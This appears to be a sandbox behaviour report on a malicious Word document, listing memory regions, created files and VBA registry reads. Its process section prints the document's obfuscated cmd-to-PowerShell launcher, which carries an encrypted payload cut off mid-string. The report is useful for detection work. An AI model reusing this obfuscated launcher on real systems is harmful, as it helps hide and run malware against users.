2f254f3d9d9c45f97a221faa02f071cba2beb92cc97848e09f6dc754a7585e95 (SHA256)
RRD-139857754091922.doc
Word Document
Created at 2018-04-05 07:19:00
Monitored Processes
Behavior Information - Grouped by Category
Process #1: winword.exe
246
0
| Information | Value |
|---|---|
| ID | #1 |
| File Name | c:\program files\microsoft office\root\office16\winword.exe |
| Command Line | "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:01:16, Reason: Analysis Target |
| Unmonitor | End Time: 00:03:32, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:16 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x998 |
| Parent PID | 0x5a8 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A6C
0x
A10
0x
A08
0x
9F8
0x
9F4
0x
9F0
0x
9EC
0x
9E8
0x
9E4
0x
9E0
0x
9DC
0x
9D8
0x
9D4
0x
9D0
0x
9B0
0x
9AC
0x
9A8
0x
9A4
0x
9A0
0x
99C
0x
A8C
0x
A90
0x
B04
0x
B08
0x
60C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00020fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00043fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x00050fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x00060fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000070000 | 0x00070000 | 0x00070fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000080000 | 0x00080000 | 0x00086fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000090000 | 0x00090000 | 0x00091fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x000a0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000000b0000 | 0x000b0000 | 0x001affff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x001b0000 | 0x00216fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000000220000 | 0x00220000 | 0x00220fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000230000 | 0x00230000 | 0x0032ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000330000 | 0x00330000 | 0x0042ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000430000 | 0x00430000 | 0x00431fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000440000 | 0x00440000 | 0x00441fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000450000 | 0x00450000 | 0x00452fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000460000 | 0x00460000 | 0x00461fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000470000 | 0x00470000 | 0x0047ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0048ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000490000 | 0x00490000 | 0x00617fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000620000 | 0x00620000 | 0x007a0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000007b0000 | 0x007b0000 | 0x01baffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| sortdefault.nls | 0x01bb0000 | 0x01e7efff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000001e80000 | 0x01e80000 | 0x02272fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000002280000 | 0x02280000 | 0x0237ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002380000 | 0x02380000 | 0x02382fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000002390000 | 0x02390000 | 0x02392fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000023a0000 | 0x023a0000 | 0x023a2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000023b0000 | 0x023b0000 | 0x023b2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000023c0000 | 0x023c0000 | 0x023c2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000023d0000 | 0x023d0000 | 0x0240ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002410000 | 0x02410000 | 0x02417fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002420000 | 0x02420000 | 0x02420fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002430000 | 0x02430000 | 0x02430fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002440000 | 0x02440000 | 0x02440fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002450000 | 0x02450000 | 0x02450fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002460000 | 0x02460000 | 0x02487fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002490000 | 0x02490000 | 0x02490fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000024a0000 | 0x024a0000 | 0x024affff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000024b0000 | 0x024b0000 | 0x026affff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000026b0000 | 0x026b0000 | 0x0278efff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000002790000 | 0x02790000 | 0x027fafff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002800000 | 0x02800000 | 0x02800fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002810000 | 0x02810000 | 0x02811fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000002820000 | 0x02820000 | 0x0289ffff | Private Memory | Readable, Writable |
|
|
|
- |
| index.dat | 0x028a0000 | 0x028abfff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| index.dat | 0x028b0000 | 0x028b7fff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| index.dat | 0x028c0000 | 0x028cbfff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000028d0000 | 0x028d0000 | 0x028d0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000028e0000 | 0x028e0000 | 0x028e0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000028f0000 | 0x028f0000 | 0x028f0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000002900000 | 0x02900000 | 0x02900fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000002910000 | 0x02910000 | 0x02914fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002920000 | 0x02920000 | 0x02a1ffff | Private Memory | Readable, Writable |
|
|
|
- |
| kernelbase.dll.mui | 0x02a20000 | 0x02adffff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| private_0x0000000002ae0000 | 0x02ae0000 | 0x02ae0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002af0000 | 0x02af0000 | 0x02af0fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002b00000 | 0x02b00000 | 0x02b01fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| msxml6r.dll | 0x02b10000 | 0x02b10fff | Memory Mapped File | Readable |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db | 0x02b20000 | 0x02b3ffff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000002b40000 | 0x02b40000 | 0x02b40fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002b50000 | 0x02b50000 | 0x02b51fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002b60000 | 0x02b60000 | 0x02c5ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002c60000 | 0x02c60000 | 0x02d5ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002d60000 | 0x02d60000 | 0x02d61fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002d80000 | 0x02d80000 | 0x02e7ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002eb0000 | 0x02eb0000 | 0x02faffff | Private Memory | Readable, Writable |
|
|
|
- |
| segoeui.ttf | 0x02fb0000 | 0x0302efff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000003060000 | 0x03060000 | 0x0306ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003090000 | 0x03090000 | 0x0310ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003110000 | 0x03110000 | 0x03241fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003260000 | 0x03260000 | 0x0335ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003380000 | 0x03380000 | 0x033fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003430000 | 0x03430000 | 0x0352ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003570000 | 0x03570000 | 0x0366ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003680000 | 0x03680000 | 0x0377ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003810000 | 0x03810000 | 0x0390ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003980000 | 0x03980000 | 0x039fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003a50000 | 0x03a50000 | 0x03acffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000003ae0000 | 0x03ae0000 | 0x03aeffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003ba0000 | 0x03ba0000 | 0x03c9ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003cd0000 | 0x03cd0000 | 0x03cdffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003ce0000 | 0x03ce0000 | 0x040dffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004130000 | 0x04130000 | 0x0422ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000042c0000 | 0x042c0000 | 0x043bffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000043c0000 | 0x043c0000 | 0x04702fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000047b0000 | 0x047b0000 | 0x048affff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004990000 | 0x04990000 | 0x0499ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004a10000 | 0x04a10000 | 0x04b0ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004c00000 | 0x04c00000 | 0x04c7ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004c90000 | 0x04c90000 | 0x04d8ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004d90000 | 0x04d90000 | 0x04e8ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004ec0000 | 0x04ec0000 | 0x04ecffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004ed0000 | 0x04ed0000 | 0x04fcffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005070000 | 0x05070000 | 0x050effff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005120000 | 0x05120000 | 0x0521ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000005220000 | 0x05220000 | 0x05a1ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005b10000 | 0x05b10000 | 0x05c0ffff | Private Memory | Readable, Writable |
|
|
|
- |
| staticcache.dat | 0x05c10000 | 0x0653ffff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000006540000 | 0x06540000 | 0x06d3ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000006d40000 | 0x06d40000 | 0x06f3ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000006f40000 | 0x06f40000 | 0x0773ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000007740000 | 0x07740000 | 0x0873ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000008760000 | 0x08760000 | 0x0885ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000089e0000 | 0x089e0000 | 0x08a5ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000008a60000 | 0x08a60000 | 0x08e5ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000036e00000 | 0x36e00000 | 0x36e0ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000036f30000 | 0x36f30000 | 0x36f3ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| osppc.dll | 0x74460000 | 0x74492fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x76cd0000 | 0x76deefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x76df0000 | 0x76ee9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x76ef0000 | 0x77098fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| psapi.dll | 0x770b0000 | 0x770b6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| normaliz.dll | 0x770c0000 | 0x770c2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| winword.exe | 0x13f130000 | 0x13f30bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x000007febcee0000 | 0x7febcee0000 | 0x7febceeffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x000007febe330000 | 0x7febe330000 | 0x7febe33ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| msptls.dll | 0x7fee4910000 | 0x7fee4a83fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| adal.dll | 0x7fee4a90000 | 0x7fee4ba9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| riched20.dll | 0x7fee4bb0000 | 0x7fee4e4afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| dwrite.dll | 0x7fee4f70000 | 0x7fee50edfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| d3d10warp.dll | 0x7fee50f0000 | 0x7fee52bffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msointl.dll | 0x7fee52c0000 | 0x7fee545cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msores.dll | 0x7fee5460000 | 0x7fee9846fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mso99lres.dll | 0x7fee9850000 | 0x7feea544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mso40uires.dll | 0x7feea550000 | 0x7feea98cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mso.dll | 0x7feea990000 | 0x7feec3bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mso98win32client.dll | 0x7feec3c0000 | 0x7feed066fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mso40uiwin32client.dll | 0x7feed070000 | 0x7feedb3efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mso30win32client.dll | 0x7feedb40000 | 0x7feee223fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mso20win32client.dll | 0x7feee230000 | 0x7feee6d2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| oart.dll | 0x7feee6e0000 | 0x7feef664fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wwlib.dll | 0x7feef670000 | 0x7fef1e48fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mscoreei.dll | 0x7fef1f80000 | 0x7fef2018fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mscoree.dll | 0x7fef2020000 | 0x7fef208efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wwintl.dll | 0x7fef2090000 | 0x7fef214ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| d2d1.dll | 0x7fef2150000 | 0x7fef2231fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mso50win32client.dll | 0x7fef2240000 | 0x7fef22cafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcp140.dll | 0x7fef22d0000 | 0x7fef236bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| d3d11.dll | 0x7fef2370000 | 0x7fef2435fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasman.dll | 0x7fef3920000 | 0x7fef393bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasapi32.dll | 0x7fef3940000 | 0x7fef39a1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| npmproxy.dll | 0x7fef4770000 | 0x7fef477bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msointl30.dll | 0x7fef4c90000 | 0x7fef4ca0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| c2r64.dll | 0x7fef4cc0000 | 0x7fef4ea9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
|
For performance reasons, the remaining 434 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\aetadzjz\appdata\local\microsoft\office\16.0\floodgate\word.settings.json | 0.08 KB |
MD5:
e4e83f8123e9740b8aa3c3dfa77c1c04
SHA1: 5281eae96efde7b0e16a1d977f005f0d3bd7aad0 SHA256: 6034f27b0823b2a6a76fe296e851939fd05324d0af9d55f249c79af118b0eb31 |
|
|
| c:\users\aetadzjz\appdata\local\microsoft\office\16.0\floodgate\word.surveyhistorystats.json | 0.01 KB |
MD5:
6ca4960355e4951c72aa5f6364e459d5
SHA1: 2fd90b4ec32804dff7a41b6e63c8b0a40b592113 SHA256: 88301f0b7e96132a2699a8bce47d120855c7f0a37054540019e3204d6bcbaba3 |
|
|
| c:\users\aetadzjz\appdata\local\microsoft\office\16.0\floodgate\word.surveyeventactivitystats.json | 0.01 KB |
MD5:
6ca4960355e4951c72aa5f6364e459d5
SHA1: 2fd90b4ec32804dff7a41b6e63c8b0a40b592113 SHA256: 88301f0b7e96132a2699a8bce47d120855c7f0a37054540019e3204d6bcbaba3 |
|
|
| c:\users\aetadzjz\appdata\local\microsoft\office\otele\{465e3f69-2650-4b51-9432-f12034cb1f3b} (0) - 2456 - winword.exe - otele.dat | 0.85 KB |
MD5:
1bca84e2ab366fd2ee293e5cdea126fa
SHA1: f6b538eec229168c909b359d921dfdfb6c43cbe9 SHA256: 29b4b2b30923c708019b13d4f3376839ffcc723011407efad9c33eebc27e1d9c |
|
|
Host Behavior
COM (1)
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | WSCript.shell | IUnknown | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 |
Registry (50)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\Licenses | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\409 | - |
|
2 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\9 | - |
|
2 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib | - |
|
2 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 | - |
|
2 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | - |
|
1 | |
| Read Value | HKEY_CLASSES_ROOT\Licenses\8804558B-B773-11d1-BC3E-0000F87552E7 | data = } |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = RequireDeclaration, data = 122, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = CompileOnDemand, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = NotifyUserBeforeStateLoss, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = BackGroundCompile, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = BreakOnAllErrors, data = 255, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = BreakOnServerErrors, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64 | data = C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB |
|
2 | |
| Read Value | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 | data = C:\Windows\system32\stdole2.tlb |
|
1 | |
| Read Value | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 | data = C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = VbaCapability, data = 26 |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} | - |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | Cmd tQZwbXH KCoJvcWVmThmQFEmEKTc lBUvzuulqjniw & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %mSjUIVjKCvrosnG%=YaAhiJLINtE&&set %iibdZAhWS%=p&&set %UKkjOWmc%=o^w&&set %CKJHjErkGaOznLZ%=UbmSUqbPikMOd&&set %orvBFUr%=!%iibdZAhWS%!&&set %GaGORjztoIjBCAG%=bMVIRrhb&&set %miGHuQvztiW%=e^r&&set %PRCHEZFPHY%=!%UKkjOWmc%!&&set %PqsKzFkV%=s&&set %bjMitdwscHzzIkV%=ZzjSCRRpVGC&&set %McrAWpDQaNJ%=he&&set %jwjXbhMi%=ll&&!%orvBFUr%!!%PRCHEZFPHY%!!%miGHuQvztiW%!!%PqsKzFkV%!!%McrAWpDQaNJ%!!%jwjXbhMi%! " ( [rUnTImE.INteRoPsERvICEs.MARshAl]::PTrTOsTrIngbSTR([RUNtIMe.INtEROpserVIcEs.MarshAL]::securEStRinGtObsTR( $('76492d1116743f0423413b16050a5345MgB8AHgAdgBHAHQANgB4AHIANwAyAFUANgBzAEsAbgB2AC8ANAA2ADQAaQByAHcAPQA9AHwANQBiADIAZABjAGYAZQBkAGMAMAA3AGMAYgA5ADAANgBkAGYAMwBjAGQANQBkADEANAA0ADgAOAA1ADkAYwBjADcAYQAzADcAYwBmAGQAZQBjADcANAAwAGIAZgAwAGYANwBlADkANgA2ADIAZgAxADcAMABiADYAYgBkADcAZQA2AGMAZQA5ADYAZgBhAGYAZgBiAGYAOQBjADEAYQBhADIAYgA5ADUAYQA1ADUAMwBmADkAYwAwAGYANwA5AGMANgA0ADEANwA2AGEAYgA0ADQAYgBmAGIANgBmADgAMAAzADYAOQA3AGIAYgBiADAANgA2AGEANQA4ADYAYQA0ADEAMABlAGUANgA4ADAAYgAyAGEAMgA5AGUAOQBkADQAOAA1ADQAYQAyADAAYQA4AGUANQA0AGYAMQAyAGQAYwBhADAANABmADMANABlAGMAZgA1AGUAMgAzADEANwBjADQAMgBkAGEAMQBmAGUAMwBiADYAYgBlADQAMgAzADMAMwAyAGIANgA4AGUAYgA1ADQAMQBlADQANwAyADUAZQBjADEAOQBlAGMANABiAGEAYwBiADAAMABjAGQAYwA1AGQAYQA4ADAANQBhADUANAAyAGUANAAzADUAOABmADcAMgAwADYAYQA2AGYAYwA4ADUAMgA5ADkAMwA5ADcAYwA5ADYAMQBiADgAYgA0ADIAMgBiADUANgAzAGQAYgA5AGUAMgA0ADAANABhADEANQA4AGMAZQBhAGUAMAA3AGEANwAzADUAZQBjADMAMwBiAGUANABlADYAMAA1ADkAMABmAGMAMQAzADcAMQAwADIAOQAxADYAMAA4ADYAMwAyADUAMAA3AGQAYgBiADQAMQBhAGIAYgBkAGYAZgA0AGMANwA0ADMAYwA4ADkAYQBkAGYAOAA5ADQAYQBhAGMAZgAyADUANwBhADEANAA1AGQAZQA0ADAAYQA3ADUANQAxADIAOQAzAGIAZgA0AGMAMwAyAD